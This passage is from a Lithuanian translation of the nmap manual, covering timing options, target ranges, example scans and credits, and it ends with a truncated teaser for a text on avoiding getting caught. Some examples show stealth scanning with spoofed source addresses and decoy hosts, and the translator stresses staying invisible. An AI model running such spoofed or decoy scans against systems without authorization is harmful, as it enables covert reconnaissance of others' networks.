(0-5), kur 0 == Paranoid, 1 == Sneaky ir t.t.
–host_timeout
Nurodo kiek laiko nmap’as gali skanuoti duotąjį IP.
Laikas turi būti nemažiau nei 200 milisekundžių.
–max_rtt_timeout
Kiek daugiausia laiko nmap’as gali laukti atsakymo
iš skanuojamo IP.
–scan_delay
Nustato minimalų laiko tarpą, kuri nmap’as turi
laukti tarp bandymų. Tai naudingiausia siekiant
sumažinti tinklo apkrovimą.
TAIKINIO NURODYMO BŪDAI
Viskas, kas nėra opcijos, nmap’e suprantama kaip taikinys.
Paprasčiausias būdas yra nurodyti konkrečius IP arba hos
tus. Jeigu norite nuskanuoti IP adresų subnet’ą, galite
pridėti /maskę hostname’ui ar IP adresui. Maskė turi būti
tarp 0 (norint nuskanuoti visą internetą) ir 32 (norint
nuskanuoti konkretų host’ą/IP. Naudok /24 ‘C’ klasės
adresų skanavimui bei /16 ‘B’ klasės adresų skanavimui.
nmap’as taip pat turi gan patogią galimybę nustatinėti IP
adresus sąrašais/atstumais. pvz. gali nuskanuoti ‘B’ klasę
užrašydamas 128.210.*.* arba 128.210.0-255.0-255 arba dar
128.210.0-50,51-255.1,2,3,4,5-255 . Manau kad tai pakanka
mai patogu ir nesudėtinga.
KELETAS PAVYZDŽIŲ
nmap -sX -e lo -P0 -S 127.0.0.3 localhost
Pasinaudodamas Xmas Tree skanavimo metodu,
apsimetinėdamas, kad esu 127.0.0.3 Loopback protokolu
skanuoju savo localhost’ą Štai kaip atrodo ipchains’ų
log’as:
Packet log: input DENY lo PROTO=6 127.0.0.3:37009
127.0.0.1:139 L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)
kaip matote, kernelis yra įsitikinęs, kad jį skanuoja iš
127.0.0.3 o tai ir yra vienas svarbiausių uždavinių –
likti nematomiems 🙂
nmap -sS -O target.example.com/24
stealth SYN metodu nuskanuoja visas 255 mašinas, esančias
target.example.com ‘C’ klasėje. Taip pat bando nustatyti
kiekvieno iš jų operacinę sistemą.
host -l company.com | cut ‘-d ‘ -f 4 | ./nmap -v -iL –
suranda visus *.company.com hostus ir atiduoda juos
nmap’ui, kuris savo ruožtu įsijungęs verbose mode visus
juos nuskanuoja.
nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/crazy
-p 1-1024 -O crazy.com
skanauoja Null skanavimo režimu, panaudoja du decoy
adresus, viską logina į /tmp/crazy failą, skanuoja nuo 1
iki 1024 crazy.com portus bei stengiasi atspėti crazy.com
serverio operacinę sistemą
BUGAI
Vabalėliai? Kokie dar vabalėliai? Na.. jei rasit kokių,
būtinai siūskit autoriui: . Pachai
taip pat labai laukiami. Taip pat nepamirškite siūsti OS’ų
fingerprintus, kad nmap’o autoriai galėtų plėsti duom.
bazę. Apie tai smulkiau galite rasti docs/nmap-finger
printing-article.txt dokumente arba nmap’o puslapyje:
http://www.insecure.org/nmap
AUTORIUS: Fyodor fyodor@insecure.org
IŠVERTĖ: Aurimas Mikalauskas inner@dammit.lt
PLATINIMAS
Naujausią nmap’o versiją visada galite rasti čia:
http://www.insecure.org/nmap/
nmap is (C) 1997,1998,1999,2000 by Fyodor fyodor@insecure.org
libpcap’as yra taip pat platinamas kartu su nmap’u.
Autorines teises į jį turi Van Jacobson, Craig Leres ir
Steven McCanne, visi iš Lawrence Berkeley nacionalinės
Laboratorijos Kalifornijos Universiteto, Berkeley, CA.
Versija platinama su nmap’u gali būti perrašinėjama. Sour
cus galit parsisiūsti iš ftp://ftp.ee.lbl.gov/libpcap.tar.Z
PABAIGAI
Džiaugiuosi, kad pagaliau pasiekėte galą. Dabar jau galite
skaityti save kvalifikuotu nmap’o guru.
beje, jei norite ką nors pridėti ar pakeisti šiame doku
mente, arba (neduok Dieve) radot kokių tai bug’u, rašykit
man adresu, pateiktu sekcijoje išvertė. Šiaip šitas manu
alas abejoju ar bus atnaujinamas, bet pačią naujausią
nmap-lt-HOWTO visada galite rasti mano puslapyje:
http://ice.dammit.lt/~inner/
37. Paranoja arba kaip neikliuti
Prie ko cia ta paranoja? As zinau kas yra exploitas etc ir as galiu hakinti v
. . .
Įvesk savo email ir skaityk visą tekstą